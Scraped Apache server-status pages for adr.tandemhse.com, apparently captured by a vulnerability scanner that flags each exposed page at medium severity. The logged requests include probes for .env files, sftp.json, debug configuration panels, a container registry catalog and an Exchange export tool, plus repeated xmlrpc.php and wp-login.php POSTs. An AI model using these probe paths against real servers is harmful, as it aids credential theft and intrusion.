Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Sunday, 28-Apr-2024 23:41:37 CEST Restart Time: Wednesday, 31-Jan-2024 10:42:58 CET Parent Server Config. Generation: 840 Parent Server MPM Generation: 839 Server uptime: 88 days 11 hours 58 minutes 38 seconds Server load: 1.07 1.09 1.15 Total accesses: 2470694 - Total Traffic: 61.1 GB - Total Duration: 1460416917 CPU Usage: u259.73 s339.72 cu12979.2 cs9233.67 - .298% CPU load .323 requests/sec - 8.4 kB/second - 25.9 kB/request - 591.096 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03159089no0yes010000 13159090no0yes010000 23159221no0yes010000 33159091no0yes19000 43159092no0yes010000 Sum500 149000 __________________________________W_______________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-83931590890/44/47977_ 6.42676605234415050.00.631111.00 141.101.95.31h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-83931590890/35/48932_ 6.38795915261997050.00.651101.30 172.68.10.8h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-83931590890/41/48272_ 6.5800315020630.00.901197.87 139.162.210.205http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-83931590890/93/48326_ 6.3110280275775640.00.941073.85 66.249.66.34http/1.1 0-83931590890/33/46866_ 6.316710229839780.00.701058.98 66.249.66.34http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-83931590890/65/46919_ 6.3200237058990.00.721144.39 66.249.66.34http/1.1relehse.com:443GET /admin_layout/assets/css/plugins/jquery-ui.css HTTP/1.1 0-83931590890/39/47581_ 6.317900211015490.00.881026.77 66.249.66.34http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-83931590890/32/47537_ 6.326710362170940.00.531060.61 66.249.66.34http/1.1relehse.com:443GET /admin_layout/assets/css/plugins/fullcalendar.css HTTP/1.1 0-83931590890/39/48166_ 6.3210248849880.00.631042.83 139.162.210.205http/1.1 0-83931590890/35/49311_ 6.317900225938930.00.422490.49 66.249.66.34http/1.1relehse.com:443GET /admin_layout/assets/css/plugins/uniform.css HTTP/1.1 1-83931590900/18/54592_ 5.275210251553990.00.791272.48 104.156.155.25http/1.1 1-83931590900/16/54736_ 5.655210347305550.00.161195.12 203.55.81.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/.env HTTP/1.1 1-83931590900/15/54013_ 5.4554219322274800.00.111122.21 66.249.66.35http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-83931590900/21/54387_ 5.7703269549040.00.751316.21 139.162.210.205http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-83931590900/22/54447_ 5.605420581035570.01.471212.75 172.71.123.2h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-83931590900/24/52632_ 5.5301528405517380.00.111325.79 172.71.184.36h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-83931590900/24/53502_ 5.62180287884960.00.321276.27 139.162.210.205h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-83931590900/17/54043_ 5.7700334884280.00.251100.14 139.162.210.205http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-83931590900/17/55645_ 5.640286320616710.00.051349.29 172.68.23.25h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-83931590900/26/54242_ 5.541841296273370.00.191176.41 139.162.210.205http/1.1 2-83931592210/389/45223_ 21.931331243874050.05.001020.29 103.23.61.80http/1.1barrerasdecontencion.com:443POST /wp-cron.php?doing_wp_cron=1714340333.06094598770141601562 2-83931592210/512/46906_ 21.92133323250512140.09.691094.91 162.158.86.134h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-83931592210/464/47787_ 21.9510237265800.07.081018.86 172.70.255.65h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-83931592210/477/46097_ 22.0000331283760.07.162474.65 139.162.210.205http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-83931592210/396/46300_ 21.93133685228125630.04.651191.21 108.162.216.227h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-83931592210/412/46229_ 21.901331113317498650.05.021023.96 172.68.26.92h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-83931592210/454/45886_ 21.95126240590680.05.902441.98 139.162.210.205http/1.1 2-83931592210/449/45879_ 22.0000229981000.06.161082.12 139.162.210.205http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-83931592210/443/46486_ 21.8613341254081450.06.691051.19 51.178.207.154h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-83931592210/404/45800_ 21.9913301155420.06.371011.62 139.162.210.205http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-83931590910/48/48583_ 7.55164165263042250.00.971184.37 167.71.102.193http/1.1barrerasdecontencion.com:443POST /wp-login.php HTTP/1.1 3-83931590910/39/48022_ 7.340421234313400.00.491190.73 139.162.210.205http/1.1 3-83931590910/37/49444_ 7.37164468347781520.00.271148.96 172.69.50.189h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-83931590910/106/49259_ 7.340220410104870.00.851175.36 139.162.210.205h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-83931590910/49/48234W 7.5100300807490.00.671037.76 139.162.210.205http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-83931590910/42/49355_ 7.403100277952510.01.811223.59 172.71.31.146h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-83931590910/91/48224_ 7.38164787278017650.02.501237.99 172.68.183.28h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-83931590910/49/48201_ 7.4310328382630.02.691057.94 139.162.210.205h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-83931590910/90/47756_ 7.27310202355790360.012.041067.52 108.162.245.72h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-83931590910/50/48957_ 7.5900264683880.01.171159.11 139.162.210.205http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 4-83931590920/19/50637_ 5.596851493333184180.00.401275.49 162.158.182.212h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-83931590920/22/50972_ 5.685200260665110.013.892641.57 203.55.81.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 4-83931590920/21/49450_ 5.3700244346380.00.251102.37 139.162.210.205http/1.1 4-83931590920/19/49262_ 5.515200358760580.00.431024.38 104.156.155.25http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-83931590920/42/49877_ 4.9910316069950.01.031252.94 139.162.210.205h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-83931590920/23/48737_ 5.6100277674010.00.621092.60 139.162.210.205h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst)
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c7551e78495a
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 19-Apr-2024 00:56:33 CEST Restart Time: Wednesday, 31-Jan-2024 10:42:58 CET Parent Server Config. Generation: 743 Parent Server MPM Generation: 742 Server uptime: 78 days 13 hours 13 minutes 35 seconds Server load: 0.16 0.11 0.04 Total accesses: 2198381 - Total Traffic: 55.0 GB - Total Duration: 1279146815 CPU Usage: u222.09 s302.45 cu11688.7 cs8497.21 - .305% CPU load .324 requests/sec - 8.5 kB/second - 26.2 kB/request - 581.859 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02805088no0yes19000 12805117no0yes010000 22804981no0yes010000 32804980no0yes010000 42804979no0yes010000 Sum500 149000 ___W______________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-74228050880/71/42838_ 8.321361212986460.01.041013.66 172.69.194.36h2lcftech.es:443done, streams: 0/21/21/0/0 (open/recv/resp/push/rst) 0-74228050880/67/43249_ 8.441385242569430.01.85974.05 178.128.207.138http/1.1 0-74228050880/73/42991_ 8.4810283058450.02.161069.41 178.128.207.138http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-74228050880/71/42812W 8.3900255214100.01.44965.95 178.128.207.138http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-74228050880/67/41948_ 8.4800212128570.01.67933.63 178.128.207.138http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-74228050880/69/41958_ 8.4900214235020.013.591002.86 178.128.207.138http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-74228050880/74/42117_ 8.3513361191669970.01.28902.19 178.128.207.138http/1.1 0-74228050880/61/42498_ 8.3514311344095630.00.68928.46 178.128.207.138h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-74228050880/62/42836_ 8.4900229582130.02.21914.92 178.128.207.138http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-74228050880/71/43810_ 8.4701207199490.00.832359.51 178.128.207.138http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-74228051170/99/49968_ 9.473935226064160.02.291131.90 172.71.30.224h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-74228051170/110/49691_ 9.2844605312679050.01.751100.10 172.69.67.155h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-74228051170/99/49127_ 9.48121215298530760.01.301025.89 178.128.207.138h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-74228051170/97/49818_ 9.4812508245146100.01.381191.67 178.128.207.138http/1.1 1-74228051170/101/49282_ 9.2613802385289710.02.051116.07 178.128.207.138http/1.1 1-74228051170/100/47723_ 9.16390370040630.01.251208.16 162.158.110.166h2lcftech.es:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-74228051170/100/48649_ 9.17450264192070.01.841189.97 162.158.110.125h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-74228051170/98/49536_ 9.4445745305519920.01.71969.33 172.71.254.131h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-74228051170/96/51272_ 9.4844293299444740.01.971205.52 172.71.166.20h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-74228051170/101/49385_ 9.5100262203290.02.991084.94 178.128.207.138http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-74228049810/13/39448_ 5.3600214920430.00.43898.99 178.128.207.138http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-74228049810/6/40672_ 4.775600225772370.00.01969.76 172.68.96.146h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-74228049810/11/41263_ 5.185600213734040.00.06866.23 162.158.110.52h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-74228049810/12/40097_ 5.175650258362460.00.012343.36 172.70.246.209h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-74228049810/10/40342_ 5.165661203135430.00.721019.37 172.70.246.210h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-74228049810/12/39930_ 5.175640291738280.00.19906.69 172.70.247.2h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-74228049810/11/39749_ 5.1600198043250.00.102328.15 172.70.246.197h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-74228049810/12/40099_ 5.185651207292920.00.04974.83 141.101.95.70h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-74228049810/10/40592_ 5.175662223250430.00.07883.57 172.70.246.170h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-74228049810/11/39566_ 4.775640275402110.00.09867.05 172.68.96.147h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-74228049800/16/44017_ 5.245660237788380.00.431089.77 172.70.246.121h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-74228049800/13/43068_ 5.245670212969130.00.201078.77 162.158.111.161h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-74228049800/13/44367_ 4.845670254318110.00.09986.44 172.68.96.150h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-74228049800/13/44045_ 4.9314258370381890.00.141054.98 178.128.207.138h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-74228049800/10/43647_ 4.705661248958200.00.14936.96 223.15.245.170http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-74228049800/17/44396_ 5.255671238441280.00.141080.47 162.158.110.237h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-74228049800/11/43291_ 5.245660255700190.00.391103.23 172.70.246.118h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-74228049800/10/42966_ 5.245661303773280.00.20913.65 172.70.246.245h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-74228049800/11/42609_ 3.98120295081720.00.18942.21 178.128.207.138h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-74228049800/18/43817_ 5.235672213537310.00.291019.86 172.70.246.36h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-74228049790/14/44903_ 5.105650264372810.00.071112.58 172.70.246.70h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-74228049790/15/44415_ 5.115651226326880.00.442497.63 172.70.246.55h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-74228049790/13/43404_ 5.155660216620380.00.15986.21 162.158.111.189h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-74228049790/11/43492_ 5.135651313903320.00.09934.13 172.70.246.212h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-74228049790/13/43657_ 5.155661270196830.00.091112.69 162.158.111.123h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-74228049790/15/42785_ 5.135660251104040.00.23992.31 172.70.247.102<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c75524aab3bc
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Wednesday, 10-Apr-2024 22:24:02 CEST Restart Time: Wednesday, 31-Jan-2024 10:42:58 CET Parent Server Config. Generation: 667 Parent Server MPM Generation: 666 Server uptime: 70 days 10 hours 41 minutes 3 seconds Server load: 0.01 0.06 0.03 Total accesses: 1971610 - Total Traffic: 49.9 GB - Total Duration: 1135203148 CPU Usage: u204 s276.25 cu10375.8 cs7578.02 - .303% CPU load .324 requests/sec - 8.6 kB/second - 26.5 kB/request - 575.775 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02385637no0yes28000 12385507no0yes010000 22385506no0yes010000 32385508no0yes010000 42385505no1yes010001 Sum501 248001 _R_W______________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-66623856370/19/37878_ 6.57160184209250.013.27906.17 159.65.18.197h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-66623856370/17/37557R 6.57390204168050.00.48863.85 128.199.22.215http/1.1barrerasdecontencion.com:443 0-66623856370/18/37551_ 6.6010228352540.00.89940.05 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-66623856370/17/37292W 6.5700214433860.00.44854.75 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-66623856370/10/36661_ 6.443948169800190.00.09812.04 128.199.22.215http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 0-66623856370/12/36982_ 5.24140180250830.00.30846.22 159.65.18.197http/1.1 0-66623856370/19/36757_ 6.6020161727020.01.33764.13 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 0-66623856370/18/36899_ 6.57390286234020.00.22824.08 172.64.236.65h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-66623856370/18/37815_ 6.60565195784170.00.41813.80 128.199.22.215http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 0-66623856370/15/38705_ 6.52550170064190.00.112258.67 128.199.22.215http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 1-66623855070/105/44678_ 11.08964195891080.01.48982.94 128.199.22.215http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 1-66623855070/113/44602_ 11.1110289026380.02.17953.03 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-66623855070/113/44295_ 11.08253273290980.01.36943.12 159.65.18.197h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-66623855070/115/44930_ 11.11948205643740.01.391089.13 128.199.22.215http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 1-66623855070/167/44201_ 11.09744367795390.02.841002.19 128.199.22.215http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 1-66623855070/125/42511_ 11.08152337129420.02.791083.01 159.65.18.197http/1.1 1-66623855070/114/43839_ 11.1132237476130.02.741075.11 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-66623855070/113/44335_ 10.98957253322360.02.90859.73 128.199.22.215http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 1-66623855070/102/46593_ 11.03753272716970.03.321085.84 128.199.22.215http/1.1barrerasdecontencion.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-66623855070/150/43859_ 11.11766214921060.01.94973.16 128.199.22.215http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 2-66623855060/104/34822_ 10.38056195529130.02.15779.92 128.199.22.215http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 2-66623855060/87/36448_ 10.331053208519770.01.14850.80 128.199.22.215http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-66623855060/93/36972_ 10.3800187121720.01.81774.13 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-66623855060/84/35840_ 10.361048239695000.01.292230.37 128.199.22.215http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 2-66623855060/77/35963_ 10.35051179616760.01.31891.50 128.199.22.215http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 2-66623855060/106/35829_ 10.3600275114690.01.63814.49 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-66623855060/98/35532_ 10.371159180957550.00.882211.70 128.199.22.215http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 2-66623855060/92/35983_ 10.331472187675620.02.24853.85 128.199.22.215http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 2-66623855060/101/36197_ 10.25141206605600.03.02782.14 172.70.174.174h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-66623855060/91/35636_ 10.361551253383970.01.65791.63 128.199.22.215http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 3-66623855080/10/40098_ 5.84143211897030.00.091024.43 159.65.18.197http/1.1 3-66623855080/9/38684_ 6.111356191420110.00.02987.63 159.65.18.197h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-66623855080/15/40226_ 6.181651235462880.00.11910.18 159.65.18.197h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-66623855080/11/39950_ 6.24200341202220.00.09940.00 172.64.236.114h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-66623855080/15/39627_ 6.262051219229690.00.15862.29 128.199.22.215http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 3-66623855080/15/40313_ 6.15200212045000.01.18966.49 172.69.180.187h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-66623855080/13/39166_ 6.2700239607030.00.341036.02 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-66623855080/15/38827_ 6.251357249560130.00.13841.61 159.65.18.197h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-66623855080/12/38765_ 6.15130240236060.00.11834.90 159.65.18.197http/1.1 3-66623855080/8/39809_ 6.2710198918220.00.68931.40 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-66623855050/10/41008_ 6.121261247757340.00.771046.67 128.199.22.215http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 4-66623855050/8/40382_ 6.03390200135960.00.032369.78 172.69.180.182h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-66623855050/13/39187_ 6.1080196925250.00.62898.97 172.64.236.9h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-66623855050/11/39737_ 6.10120300680660.00.48853.06 172.64.236.157h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-66623855050/14/39391_ 6.04120247200130.00.401001.93 172.69.180.152h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-66623855050/9/38749_ 6.03380206852850.00.06886.90 172.69.180.172h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-666
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c75553068b1b
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Thursday, 21-Mar-2024 17:04:55 CET Restart Time: Wednesday, 31-Jan-2024 10:42:58 CET Parent Server Config. Generation: 474 Parent Server MPM Generation: 473 Server uptime: 50 days 6 hours 21 minutes 57 seconds Server load: 0.06 0.11 0.09 Total accesses: 1484640 - Total Traffic: 38.8 GB - Total Duration: 807165910 CPU Usage: u253.64 s260.1 cu7389.48 cs5355.18 - .305% CPU load .342 requests/sec - 9.4 kB/second - 27.4 kB/request - 543.678 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01265364no0yes010000 11265497no1yes010001 21265363no0yes010000 31265366no0yes010000 41265365no1yes19000 Sum502 149001 _______________________________________________W__ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-47312653640/822/28402_ 51.3884912114703700.010.15654.29 172.71.26.4h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-47312653640/859/28473_ 51.5593539154630360.014.03638.94 172.70.255.127h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-47312653640/1001/28577_ 51.4411328180242560.013.96719.48 185.38.129.94h2relehse.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 0-47312653640/920/27919_ 51.5860644150387790.011.19644.35 172.70.57.164h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-47312653640/865/27711_ 51.5589659115628520.012.47631.94 172.70.255.127h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-47312653640/1020/27784_ 51.2284408106420190.025.63592.52 172.64.238.153h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-47312653640/1050/27624_ 51.5859446123444060.012.70535.38 172.70.57.164h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-47312653640/839/27733_ 51.535443234751270.022.19615.58 79.155.252.122h2relehse.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 0-47312653640/990/28577_ 50.9154383156425890.024.58595.02 172.64.238.49h2lcftech.es:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-47312653640/1175/29235_ 51.2111210593485210.015.242041.50 207.154.197.113http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-47312654970/1217/32606_ 56.25126125236200.018.92704.09 172.71.131.40h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-47312654970/897/32436_ 56.32626193546300.014.08680.49 159.89.12.166h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-47312654970/1155/32092_ 56.23624169562020.016.29682.59 159.89.12.166http/1.1 1-47312654970/957/31616_ 56.386352153995300.013.25734.80 159.89.12.166http/1.1 1-47312654970/1464/32476_ 56.21758307704470.022.73684.57 79.155.252.122h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-47312654970/1413/30644_ 56.3770239638850.019.34804.98 159.89.12.166h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-47312654970/1361/32001_ 56.3971141375280.020.85790.99 159.89.12.166http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-47312654970/956/32116_ 56.377642187268830.017.71621.73 159.89.12.166h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-47312654970/1178/34475_ 56.2834793188782010.017.08791.57 172.70.82.162h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-47312654970/1250/31081_ 56.4040138986590.019.77682.00 159.89.12.166http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-47312653630/182/24690_ 26.75392916141714570.02.96543.49 172.70.126.86h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-47312653630/251/26243_ 26.97591459145613070.04.32626.45 172.64.238.152h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-47312653630/231/26750_ 27.17397757143041930.02.31582.40 172.70.39.58h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-47312653630/212/25804_ 26.82406601185834750.05.312031.26 207.154.197.113http/1.1 2-47312653630/247/26656_ 27.1641125122611520.03.02680.46 185.38.129.94h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-47312653630/248/25984_ 26.785911994151701140.05.28607.13 172.64.238.49h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-47312653630/180/25874_ 27.075960122895590.05.651981.10 172.64.236.125h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-47312653630/175/26326_ 26.7140625385525870.03.33670.49 207.154.197.113h2done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-47312653630/187/27034_ 